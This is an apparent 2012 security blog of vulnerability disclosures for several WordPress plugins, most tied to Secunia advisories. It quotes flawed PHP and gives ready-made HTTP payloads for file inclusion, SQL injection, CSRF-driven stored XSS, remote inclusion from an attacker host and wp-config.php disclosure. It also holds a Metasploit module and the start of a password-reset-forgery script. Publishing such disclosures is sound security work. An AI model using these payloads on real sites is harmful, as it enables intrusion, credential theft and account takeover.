WordPress plugin | ceriksen.com

July 10, 2012 by Charlie Eriksen

WordPress A Page Flip Book plugin local file inclusion vulnerability

Analysis
A page flip book for WordPress allows for different languages to be used. This is toggled by posting “pageflipbook_language” to the blog, which will update an option and then include the appropiate language. This is done in the main file, pageflipbook.php, which is always included.

We can see that it checks if “pageflipbook_language” is included in a POST parameter on line 30, it will update the option on the blog, otherwise it will pull the language value from the option and put that into the variable. This value is supposed to be the name of a php file. After that, it will include the chosen language file on line 47.

if ((isset($_POST['pageflipbook_language'])) AND ($_POST['pageflipbook_language']!='')) {
    $pageflipbook_language = $_POST['pageflipbook_language'];
    update_option('pageflipbook_language', $pageflipbook_language);
}
else
    $pageflipbook_language = get_option('pageflipbook_language');
if ($pageflipbook_language == '') $pageflipbook_language = 'EN_en.php';

define ('SITE_URL', get_option('siteurl') );
define ('PAGEFLIPBOOK_UPLOAD_DIR', ABSPATH . '/wp-content/plugins/wppageflip/');
define ('PAGEFLIPBOOK_UPLOAD_URL', SITE_URL . '/wp-content/plugins/wppageflip/');
define ('PAGEFLIPBOOK_ICONES_DIR', '../wp-content/plugins/wppageflip/images/');
define ('PAGEFLIPBOOK_PLUGIN_URL', SITE_URL . '/wp-content/plugins/wppageflip/');

require_once (ABSPATH.'wp-includes/pluggable.php');
include (PAGEFLIPBOOK_UPLOAD_DIR. 'functions.php');
include (PAGEFLIPBOOK_UPLOAD_DIR. 'quicktags.php');
include (PAGEFLIPBOOK_UPLOAD_DIR. 'languages/'. $pageflipbook_language);

if ((isset($_POST['pageflipbook_language'])) AND ($_POST['pageflipbook_language']!='')) {

$pageflipbook_language = $_POST['pageflipbook_language'];

update_option('pageflipbook_language', $pageflipbook_language);

}

else

$pageflipbook_language = get_option('pageflipbook_language');

if ($pageflipbook_language == '') $pageflipbook_language = 'EN_en.php';

define ('SITE_URL', get_option('siteurl') );

define ('PAGEFLIPBOOK_UPLOAD_DIR', ABSPATH . '/wp-content/plugins/wppageflip/');

define ('PAGEFLIPBOOK_UPLOAD_URL', SITE_URL . '/wp-content/plugins/wppageflip/');

define ('PAGEFLIPBOOK_ICONES_DIR', '../wp-content/plugins/wppageflip/images/');

define ('PAGEFLIPBOOK_PLUGIN_URL', SITE_URL . '/wp-content/plugins/wppageflip/');

require_once (ABSPATH.'wp-includes/pluggable.php');

include (PAGEFLIPBOOK_UPLOAD_DIR. 'functions.php');

include (PAGEFLIPBOOK_UPLOAD_DIR. 'quicktags.php');

include (PAGEFLIPBOOK_UPLOAD_DIR. 'languages/'. $pageflipbook_language);

But because there is no validation that the file is a valid language file and there is no directory transversal, we can do a local file inclusion attack on this:

POST /wordpress/ HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

pageflipbook_language=../../../../../../../../dog.php

POST /wordpress/ HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 55

pageflipbook_language=../../../../../../../../dog.php

July 10, 2012 by Charlie Eriksen

WordPress Symposium plugin multiple SQL injection vulnerabilities

Advisory
Secunia Advisory SA 49534

Analysis of group_menu_settings vulnerability
The group_menu_settings function in /ajax/symposium_group_functions.php allows an user to show settings for a group. The function takes a POST parameter called “uid1″, which is used for a sql query.

// Show Group Settings
if ($_POST['action'] == 'group_menu_settings') {

    global $wpdb, $current_user;

    $gid = $_POST['uid1'];

    $group = $wpdb->get_row($wpdb->prepare("SELECT * FROM ".$wpdb->prefix . 'symposium_groups WHERE gid='.$gid));

// Show Group Settings

if ($_POST['action'] == 'group_menu_settings') {

global $wpdb, $current_user;

$gid = $_POST['uid1'];

$group = $wpdb->get_row($wpdb->prepare("SELECT * FROM ".$wpdb->prefix . 'symposium_groups WHERE gid='.$gid));

However due to an incorrect use of wpdb->prepare, the groupID is never sanitized. Also the function does not check user credentials until line 616, and as such allows for a SQL injection through a simple POST request like this:

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_group_functions.php
HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

action=group_menu_settings&uid1=353535 OR 1 = 1

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_group_functions.php

HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 49

action=group_menu_settings&uid1=353535 OR 1 = 1

Analysis of loadComposeForm vulnerability
The loadComposeForm function in /ajax/symposium_mail_functions.php is used to fetch the display name of an userID through a simple SQL query like this:

// Load Compose Forum
if ($_POST['action'] == 'loadComposeForm') {

    if (is_user_logged_in()) {

        $mail_to = $_POST["mail_to"];
        $recipient = $wpdb->get_var("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$mail_to);

        echo $recipient;

// Load Compose Forum

if ($_POST['action'] == 'loadComposeForm') {

if (is_user_logged_in()) {

$mail_to = $_POST["mail_to"];

$recipient = $wpdb->get_var("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$mail_to);

echo $recipient;

It first checks if the user is logged in, and then takes to mail_to POST parameter and append it to the query. But because there is no validation that the mail_to variable is in fact an integer, we can make a POST request if we have an authentication cookie, and exploit this SQL injection vulnerability:

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_mail_functions.php HTTP/1.1
Host: 192.168.80.130
Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7Ccb77d4fd4fcd2448f70ceefc746f38fe;  wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7C486bd8321f9973799f837e666abb40f4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

action=loadComposeForm&mail_to=1335353 UNION SELECT @@version

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_mail_functions.php HTTP/1.1

Host: 192.168.80.130

Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7Ccb77d4fd4fcd2448f70ceefc746f38fe; wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7C486bd8321f9973799f837e666abb40f4;

Content-Type: application/x-www-form-urlencoded

Content-Length: 63

action=loadComposeForm&mail_to=1335353 UNION SELECT @@version

Analysis of getReply vulnerability
The getReply function in /ajax/symposium_mail_functions.php is used to fetch the display name of a recipient and message information about a particular mail.

// Get reply info
if ($_POST['action'] == 'getReply') {

    if (is_user_logged_in()) {

        $mid = $_POST["mail_id"];
        $recipient_id = $_POST["recipient_id"];

        $recipient = $wpdb->get_var("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$recipient_id);
        $mail_message = $wpdb->get_row("SELECT m.*, u.display_name FROM ".$wpdb->base_prefix."symposium_mail m LEFT JOIN ".$wpdb->base_prefix."users u ON m.mail_from = u.ID WHERE mail_mid = ".$mid);

// Get reply info

if ($_POST['action'] == 'getReply') {

if (is_user_logged_in()) {

$mid = $_POST["mail_id"];

$recipient_id = $_POST["recipient_id"];

$recipient = $wpdb->get_var("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$recipient_id);

$mail_message = $wpdb->get_row("SELECT m.*, u.display_name FROM ".$wpdb->base_prefix."symposium_mail m LEFT JOIN ".$wpdb->base_prefix."users u ON m.mail_from = u.ID WHERE mail_mid = ".$mid);

It first checks if the user is logged in, and then takes to mail_id and recipient_id POST parameter and stitches those into 2 SQL queries using simple concatenation. However due to a lack of validation of the parameters being integers, we can exploit this:

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_mail_functions.php HTTP/1.1
Host: 192.168.80.130
Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7Ccb77d4fd4fcd2448f70ceefc746f38fe;  wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7C486bd8321f9973799f837e666abb40f4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

action=getReply&recipient_id=1353533 UNION SELECT @@version&mail_id=335353 UNION SELECT @@version, user(), system_user(), database(), @@hostname, @@datadir, 7, 8, 9, 10

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_mail_functions.php HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 162

action=getReply&recipient_id=1353533 UNION SELECT @@version&mail_id=335353 UNION SELECT @@version, user(), system_user(), database(), @@hostname, @@datadir, 7, 8, 9, 10

Analysis of symposium_openchat vulnerability
The symposium_openchat function in /ajax/symposium_bar_functions.php allows for opening a chat with another user on the site. It does so by getting the chat_to POST parameter, which si expected to be an integer, and then checks if that chat already exists:

// Open chat
if ($_POST['action'] == 'symposium_openchat') {

    global $wpdb, $current_user;

    if (is_user_logged_in()) {

        $chat_to = $_POST['chat_to'];
        $chat_from = $current_user->ID;
        $r = ';

        // check to see if they are already chatting
        if ($wpdb->query( $wpdb->prepare("SELECT chid FROM ".$wpdb->base_prefix."symposium_chat WHERE (chat_from = ".$chat_from." AND chat_to = ".$chat_to.") OR (chat_from = ".$chat_to." AND chat_to = ".$chat_from.")"))) {

            // clear the closed flag
            $sql = "DELETE FROM ".$wpdb->base_prefix."symposium_chat WHERE chat_message = '[closed-%d]' AND ( (chat_from = %d AND chat_to = %d) OR (chat_from = %d AND chat_to = %d) )";
            $wpdb->query( $wpdb->prepare($sql, $chat_from, $chat_from, $chat_to, $chat_to, $chat_from) );
            $r .= $chat_to;

        } else {

            if ( $rows_affected = $wpdb->insert( $wpdb->base_prefix . "symposium_chat", array( 
                'chat_to' => $chat_to, 
                'chat_from' => $chat_from, 
                'chat_message' => '[start]',
                'chat_timestamp' => date("Y-m-d H:i:s") 
            ) ) ) {

                $display_name = $wpdb->get_var($wpdb->prepare("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$chat_to));
                $r .= "OK[split]".$chat_to."[split]".$display_name;

            }
        }

        echo $r;

// Open chat

if ($_POST['action'] == 'symposium_openchat') {

global $wpdb, $current_user;

if (is_user_logged_in()) {

$chat_to = $_POST['chat_to'];

$chat_from = $current_user->ID;

$r = ';

// check to see if they are already chatting

if ($wpdb->query( $wpdb->prepare("SELECT chid FROM ".$wpdb->base_prefix."symposium_chat WHERE (chat_from = ".$chat_from." AND chat_to = ".$chat_to.") OR (chat_from = ".$chat_to." AND chat_to = ".$chat_from.")"))) {

// clear the closed flag

$sql = "DELETE FROM ".$wpdb->base_prefix."symposium_chat WHERE chat_message = '[closed-%d]' AND ( (chat_from = %d AND chat_to = %d) OR (chat_from = %d AND chat_to = %d) )";

$wpdb->query( $wpdb->prepare($sql, $chat_from, $chat_from, $chat_to, $chat_to, $chat_from) );

$r .= $chat_to;

} else {

if ( $rows_affected = $wpdb->insert( $wpdb->base_prefix . "symposium_chat", array(

'chat_to' => $chat_to,

'chat_from' => $chat_from,

'chat_message' => '[start]',

'chat_timestamp' => date("Y-m-d H:i:s")

) ) ) {

$display_name = $wpdb->get_var($wpdb->prepare("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$chat_to));

$r .= "OK[split]".$chat_to."[split]".$display_name;

}

echo $r;

If you’re logged in and the chat does not exist, on line 572 it will then insert a new chat and select the display name from the user table, and incorrectly use the wpdb_prepare function. By rather concatenating the ID in instead of passing it as a parameter, we can now select data out of the database like this:

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_bar_functions.php HTTP/1.1
Host: 192.168.80.130
Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7Ccb77d4fd4fcd2448f70ceefc746f38fe;  wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7C486bd8321f9973799f837e666abb40f4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

action=symposium_openchat&chat_to=3535 UNION SELECT @@version

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_bar_functions.php HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 63

action=symposium_openchat&chat_to=3535 UNION SELECT @@version

Analysis of getEditDetails vulnerability
The getEditDetails function in /ajax/symposium_forum_functions.php gets the contents of a post for the edit page.

// AJAX function to get topic details for editing
if ($_POST['action'] == 'getEditDetails') {

    if (is_user_logged_in()) {

        $tid = $_POST['tid'];   

        $details = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix.'symposium_topics'." WHERE tid = ".$tid);

// AJAX function to get topic details for editing

if ($_POST['action'] == 'getEditDetails') {

if (is_user_logged_in()) {

$tid = $_POST['tid'];

$details = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix.'symposium_topics'." WHERE tid = ".$tid);

It checks if you’re logged in, and then takes the tid POST parameter and concatenates it into a SQL query without casting it to an integer or otherwise sanitizes it. This means we can exploit it by making a request like this:

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_forum_functions.php HTTP/1.1
Host: 192.168.80.130
Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7Ccb77d4fd4fcd2448f70ceefc746f38fe;  wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7C486bd8321f9973799f837e666abb40f4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 149

action=getEditDetails&tid=2323 UNION SELECT system_user(), 2, @@datadir, @@version, user(), 6, 7, @@hostname, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_forum_functions.php HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 149

action=getEditDetails&tid=2323 UNION SELECT system_user(), 2, @@datadir, @@version, user(), 6, 7, @@hostname, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18

Multiple blind injection spots in /ajax/symposium_mail_functions.php
On line 94, 101, 208, 210, 274, 276 in /ajax/symposium_mail_functions.php there is also a lack of validation of integer inputs, which allows for arbitrary query execution.

July 3, 2012 by Charlie Eriksen

WordPress Quotes Collection plugin cross-site request forgery vulnerability

Advisory
Secunia Advisory SA 49653

Analysis
A type of vulnerability that seems to be fairly common is CSRF. You can obviously speculate as to why, but I found this interesting one. I normally won’t publish CSRF vulnerabilities, but there are cases where they can abuse the inherent trust that is put in an admin to not attempt to exploit the blog readers.

In this case, because the admin pages did not make use of nonces, we are able to craft a page which will make the user make a GET request with a XSS payload, which will at no point be sanitized besides being escaped for inserting into the database.

function quotescollection_addquote($quote, $author = "", $source = "", $tags = "", $public = 'yes')
{
    if(!$quote) return __('Nothing added to the database.', 'quotes-collection');
    global $wpdb;
    $table_name = $wpdb->prefix . "quotescollection";
    if($wpdb->get_var("SHOW TABLES LIKE '$table_name'") != $table_name) 
        return __('Database table not found', 'quotes-collection');
    else //Add the quote data to the database
    {

        $quote = stripslashes($quote);
        $author = stripslashes($author);    
        $source = stripslashes($source);    
        $tags = stripslashes($tags);

        $quote = "'".$wpdb->escape($quote)."'";
        $author = $author?"'".$wpdb->escape($author)."'":"NULL";
        $source = $source?"'".$wpdb->escape($source)."'":"NULL";
        $tags = explode(',', $tags);
        foreach ($tags as $key => $tag)
            $tags[$key] = trim($tag);
        $tags = implode(',', $tags);
        $tags = $tags?"'".$wpdb->escape($tags)."'":"NULL";
        if(!$public) $public = "'no'";
        else $public = "'yes'";
        $insert = "INSERT INTO " . $table_name .
            "(quote, author, source, tags, public, time_added)" .
            "VALUES ({$quote}, {$author}, {$source}, {$tags}, {$public}, NOW())";
        $results = $wpdb->query( $insert );
        if(FALSE === $results)
            return __('There was an error in the MySQL query', 'quotes-collection');
        else
            return __('Quote added', 'quotes-collection');
   }
}

function quotescollection_addquote($quote, $author = "", $source = "", $tags = "", $public = 'yes')

{

if(!$quote) return __('Nothing added to the database.', 'quotes-collection');

global $wpdb;

$table_name = $wpdb->prefix . "quotescollection";

if($wpdb->get_var("SHOW TABLES LIKE '$table_name'") != $table_name)

return __('Database table not found', 'quotes-collection');

else //Add the quote data to the database

{

$quote = stripslashes($quote);

$author = stripslashes($author);

$source = stripslashes($source);

$tags = stripslashes($tags);

$quote = "'".$wpdb->escape($quote)."'";

$author = $author?"'".$wpdb->escape($author)."'":"NULL";

$source = $source?"'".$wpdb->escape($source)."'":"NULL";

$tags = explode(',', $tags);

foreach ($tags as $key => $tag)

$tags[$key] = trim($tag);

$tags = implode(',', $tags);

$tags = $tags?"'".$wpdb->escape($tags)."'":"NULL";

if(!$public) $public = "'no'";

else $public = "'yes'";

$insert = "INSERT INTO " . $table_name .

"(quote, author, source, tags, public, time_added)" .

"VALUES ({$quote}, {$author}, {$source}, {$tags}, {$public}, NOW())";

$results = $wpdb->query( $insert );

if(FALSE === $results)

return __('There was an error in the MySQL query', 'quotes-collection');

else

return __('Quote added', 'quotes-collection');

}

If we either make this request directly, simulating a CSRF attack, or actually create a malicious page and convince an admin on a WordPress blog with this plugin to click on your link, we can cause a persistent XSS due to the lack of a nonce and sanitizing of html input.

GET /wordpress/wp-admin/admin.php?page=quotes-collection&submit=AddQuote&public=on&tags=x&source=<script>alert(1)</script>&author=<script>alert(2)</script>&quote=<script>alert(3)</script> HTTP/1.1
Host: 192.168.80.130

1 2	GET /wordpress/wp-admin/admin.php?page=quotes-collection&submit=AddQuote&public=on&tags=x&source=<script>alert(1)</script>&author=<script>alert(2)</script>&quote=<script>alert(3)</script> HTTP/1.1 Host: 192.168.80.130

July 2, 2012 by Charlie Eriksen

WordPress Zingiri Shop plugin “abspath” remote file inclusion vulnerability

Advisory
Secunia Advisory SA 49676

Analysis
I had been looking at this particular piece of code for a while. At a glance, while the handling of the looks somewhat safe due to the validation that the input path is in fact a directory, so at best you could sort of chain an exploit with this. The question is, how could you take this to a RFI? Lets look at /fws/download.php:

if (isset($_POST['abspath'])) $abspath=$_POST['abspath']; else $abspath=$_GET['abspath'];
if (!is_dir($abspath)) die('Error downloading');
require($abspath.'wp-blog-header.php');

if (isset($_POST['abspath'])) $abspath=$_POST['abspath']; else $abspath=$_GET['abspath'];

if (!is_dir($abspath)) die('Error downloading');

require($abspath.'wp-blog-header.php');

As you see, this may very well look safe at a glance. For us to be able to exploit the fact that the ‘abspath’ variable is user controlled, we need to get a true back from is_dir. I checked with google how to pull this off when providing a remote host. This isn’t possible with HTTP, and nobody suggested an alternative. For this to work, the protocol wrapper needs to support the “stat()” family of functions. HTTP isn’t one of these. But as it turns out, FTP is. Bingo! We now have a piece of code that through a very specific detail in the PHP implementation, that we can exploit.

By putting up a FTP server with some specified credentials, and a file called wp-blog-header.php with some malicious PHP, we can include an URL in the abspath GET parameter, which will exploit this vulnerability:

GET /wordpress/wp-content/plugins/zingiri-web-shop/fws/download.php?abspath=ftp://dog:hello@localhost/ HTTP/1.1
Host: 192.168.80.130

1 2	GET /wordpress/wp-content/plugins/zingiri-web-shop/fws/download.php?abspath=ftp://dog:hello@localhost/ HTTP/1.1 Host: 192.168.80.130

June 21, 2012 by Charlie Eriksen

WordPress Mac Photo Gallery plugin “albid” arbitrary file disclosure vulnerability

Advisory
Secunia Advisory SA 49650

Analysis
This vulnerability relies on a lack of validation of the “albid” in macdownload.php, which is passed straight into the path that is read at line 37 into the response. This cases an arbitrary file disclosure vulnerability.

require_once( dirname(__FILE__) . '/macDirectory.php');

$folder = dirname(plugin_basename(__FILE__));
$file = dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];

    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);
?>

require_once( dirname(__FILE__) . '/macDirectory.php');

$folder = dirname(plugin_basename(__FILE__));

$file = dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];

header('Content-Description: File Transfer');

header('Content-Type: application/octet-stream');

header('Content-Disposition: attachment; filename='.basename($file));

header('Content-Transfer-Encoding: binary');

header('Expires: 0');

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');

header('Pragma: public');

header('Content-Length: ' . filesize($file));

ob_clean();

flush();

readfile($file);

If we make a request like this, it will cause the code to read out the wp-config.php file, which will contain database credentials in.

GET /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php HTTP/1.1
Host: 192.168.80.130

1 2	GET /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php HTTP/1.1 Host: 192.168.80.130

June 21, 2012 by Charlie Eriksen

WordPress Nmedia MailChimp widget “abs_path” remote file inclusion vulnerability

Advisory
Secunia Advisory SA 49538

Analysis
This vulnerability is nothing but a textbook arbitrary file inclusion vulnerability. The file is used to interacting with the mailchimp API. But the very first 2 lines of executable code in /api_mailchimp/postToMailChimp.php, it goes ahead and accepts a path for loading a file.

$path = $_POST['abs_path'] . 'wp-load.php';
//echo $path; die;
require( $path );

$path = $_POST['abs_path'] . 'wp-load.php';

//echo $path; die;

require( $path );

By making following request, where the url has a file called ‘wp-load.php’ or otherwise will return php code, or using the proof of concept code, we can exploit this

POST /wordpress/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php
HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

abs_path=http://myevildomain.com/

POST /wordpress/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php

HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 21

abs_path=http://myevildomain.com/

Proof of concept code

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::Remote::HttpServer::PHPInclude

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'WordPress Nmedia MailChimp Widget "abs_path" Remote File Inclusion Vulnerability',
            'Description'    => %q{
                    This module exploits a remote file include execution vulnerability in the
                WordPress Nmedia MailChimp Widget '/api_mailchimp/postToMailChimp.php' script. 
                All versions of Nmedia MailChimp Widget up to and including 3.1 are vulnerable.
            },
            'Author'         => [ 'Charlie Eriksen' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision$',
            'References'     =>
                [
                    [ 'URL', 'http://secunia.com/advisories/49538/' ],
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'ConnectionType' => 'find',
                        },
                    # Arbitrary big number. The payload gets sent as an HTTP
                    # response body, so really it's unlimited
                    'Space'       => 262144, # 256k
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Jun 21 2012',
            'DefaultTarget' => 0))

        register_options(
            [
                OptString.new('PHPURI', [ true , "The URI to request", '/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php']),
            ], self.class)
    end

    def php_exploit
        postdata = 'abs_path=' << php_include_url

        print_status("Sending exploit request...")
        response = send_request_raw({
            'global'  => true,
            'method'  => 'POST',
            'uri'     => datastore['PHPURI'],
            'data'    => postdata,
            'headers' =>
            {
                'Content-Type' => 'application/x-www-form-urlencoded',
                'Content-Length' => postdata.length,
            }
        })

        if response and response.code != 200
            print_error("Got a non-200 response back. The server may not be vulnerable (#{response.code})")
        end

        handler
    end

end

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::Remote::HttpServer::PHPInclude

def initialize(info = {})

super(update_info(info,

'Name' => 'WordPress Nmedia MailChimp Widget "abs_path" Remote File Inclusion Vulnerability',

'Description' => %q{

This module exploits a remote file include execution vulnerability in the

WordPress Nmedia MailChimp Widget '/api_mailchimp/postToMailChimp.php' script.

All versions of Nmedia MailChimp Widget up to and including 3.1 are vulnerable.

'Author' => [ 'Charlie Eriksen' ],

'License' => MSF_LICENSE,

'Version' => '$Revision$',

'References' =>

[

[ 'URL', 'http://secunia.com/advisories/49538/' ],

'Privileged' => false,

'Payload' =>

{

'DisableNops' => true,

'Compat' =>

{

'ConnectionType' => 'find',

# Arbitrary big number. The payload gets sent as an HTTP

# response body, so really it's unlimited

'Space' => 262144, # 256k

'Platform' => 'php',

'Arch' => ARCH_PHP,

'Targets' => [[ 'Automatic', { }]],

'DisclosureDate' => 'Jun 21 2012',

'DefaultTarget' => 0))

register_options(

[

OptString.new('PHPURI', [ true , "The URI to request", '/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php']),

], self.class)

end

def php_exploit

postdata = 'abs_path=' << php_include_url

print_status("Sending exploit request...")

response = send_request_raw({

'global' => true,

'method' => 'POST',

'uri' => datastore['PHPURI'],

'data' => postdata,

'headers' =>

{

'Content-Type' => 'application/x-www-form-urlencoded',

'Content-Length' => postdata.length,

}

})

if response and response.code != 200

print_error("Got a non-200 response back. The server may not be vulnerable (#{response.code})")

end

handler

end

June 20, 2012 by Charlie Eriksen

WordPress TheCartPress plugin order information security bypass

Advisory
Secunia Advisory SA 49652

Analysis
TheCartPress has functionality for an admin to view and print an order. This functionality extends also to the customer to print the order. By providing the orderID, the user can view and print the order. However there was a distinct lack of any validation about whether or not the user requesting the order owned it.

The entry point to print an order is /admin/PrintOrder.php:

$order_id  = isset( $_REQUEST['order_id'] ) ? $_REQUEST['order_id'] : 0;
$file_name  = 'tcp_print_order.php';
$template   = STYLESHEETPATH . '/' . $file_name;
$template   = apply_filters( 'tcp_get_print_order_template', $template, $order_id );
if ( file_exists( $template ) ) {
    include( $template );
} else {
    $template = get_template_directory() . '/' . $file_name;
    if ( STYLESHEETPATH != get_template_directory() && file_exists( $template ) ) {
        include( $template );
    } else {
        $template = TCP_THEMES_TEMPLATES_FOLDER . $file_name;
        if ( file_exists( $template ) ) {
            include( $template );
        }
    }
}

$order_id = isset( $_REQUEST['order_id'] ) ? $_REQUEST['order_id'] : 0;

$file_name = 'tcp_print_order.php';

$template = STYLESHEETPATH . '/' . $file_name;

$template = apply_filters( 'tcp_get_print_order_template', $template, $order_id );

if ( file_exists( $template ) ) {

include( $template );

} else {

$template = get_template_directory() . '/' . $file_name;

if ( STYLESHEETPATH != get_template_directory() && file_exists( $template ) ) {

include( $template );

} else {

$template = TCP_THEMES_TEMPLATES_FOLDER . $file_name;

if ( file_exists( $template ) ) {

include( $template );

}

This fetches the template that is going to be used to used for the page to be printed. By default, this is /theme-templates/tcp_print_order.php:

    if ( isset( $_REQUEST['order_id'] ) ) {
        require_once( TCP_CLASSES_FOLDER . 'OrderPage.class.php' );
        $order_id = $_REQUEST['order_id'];
        OrderPage::show( $order_id, true );
    }

if ( isset( $_REQUEST['order_id'] ) ) {

require_once( TCP_CLASSES_FOLDER . 'OrderPage.class.php' );

$order_id = $_REQUEST['order_id'];

OrderPage::show( $order_id, true );

}

The template goes ahead and passes on the order_id in the request to the OrderPage::show method. Notice that at no point has there been any validation of the order belonging to the user requesting the page. Anyway, we call into the show method, which is in fact the only method on the OrderPage class in /classes/OrderPage.class.php:

class OrderPage {

    static function show( $order_id, $see_comment = true, $echo = true, $see_address = true, $see_full = false ) {
        require_once( TCP_CLASSES_FOLDER . 'CartTable.class.php' );
        require_once( TCP_CLASSES_FOLDER . 'CartSourceDB.class.php' );
        $cart_table = new TCPCartTable( );
        return $cart_table->show( new TCP_CartSourceDB( $order_id, $see_address, $see_full, true, $see_comment ), $echo );
    }
}

class OrderPage {

static function show( $order_id, $see_comment = true, $echo = true, $see_address = true, $see_full = false ) {

require_once( TCP_CLASSES_FOLDER . 'CartTable.class.php' );

require_once( TCP_CLASSES_FOLDER . 'CartSourceDB.class.php' );

$cart_table = new TCPCartTable( );

return $cart_table->show( new TCP_CartSourceDB( $order_id, $see_address, $see_full, true, $see_comment ), $echo );

}

This method effectively just fetches the order from database, and then returns it. There’s no reference to the active user, which is the gist of this vulnerability. A lack of validation of the requesting user being also the owner of the order, or an admin.

May 23, 2012 by Charlie Eriksen

WordPress Profile Builder plugin vertical privilege escalation

Advisory
Secunia Advisory SA 49201

Analysis

Profile builder implemented its own password recovery system on top of the existing wordpress system in /front-end/wppb.recover.password.php. It does so by taking a request with a password reset key which is generated using a statically salted md5 hash of the user name, userID and two static strings, both computed when the password reset mail is send and then calculated again when the user accesses the link provided in the password reset mail.

//this is the part that handles the actual recovery
if (isset($_GET['submited']) && isset($_GET['loginName']) && isset($_GET['key'])){
    //get the login name and key and verify if they match the ones in the database
    $query = $wpdb->get_results( "SELECT * FROM $wpdb->users WHERE user_login='".$_GET['loginName']."'");
    $dbValue = $query[0]->user_activation_key;
    $id = $query[0]->ID;
    $localHashValue = md5($_GET['loginName'].'RMPBP'.$id.'PWRCVR');
    if ($localHashValue == $_GET['key']) {

//this is the part that handles the actual recovery

if (isset($_GET['submited']) && isset($_GET['loginName']) && isset($_GET['key'])){

//get the login name and key and verify if they match the ones in the database

$query = $wpdb->get_results( "SELECT * FROM $wpdb->users WHERE user_login='".$_GET['loginName']."'");

$dbValue = $query[0]->user_activation_key;

$id = $query[0]->ID;

$localHashValue = md5($_GET['loginName'].'RMPBP'.$id.'PWRCVR');

if ($localHashValue == $_GET['key']) {

As you can see, we fetch the userID associated with the provided user name, and then proceed to recalculate the hash and compare that against the key provided. If those match, you can now change the password.

Because this value is not at all random, it allows us to calculate this value for any user granted that we know the user name and user id(Which could easily be guessed for most sites by iterating through even a small sequenstial list of numbers), and subsequently change their password even if they did not request it, causing a vertical privilege escalation vulnerability.

Proof of concept code

import md5
m = md5.new()
userName = raw_input("Username:")
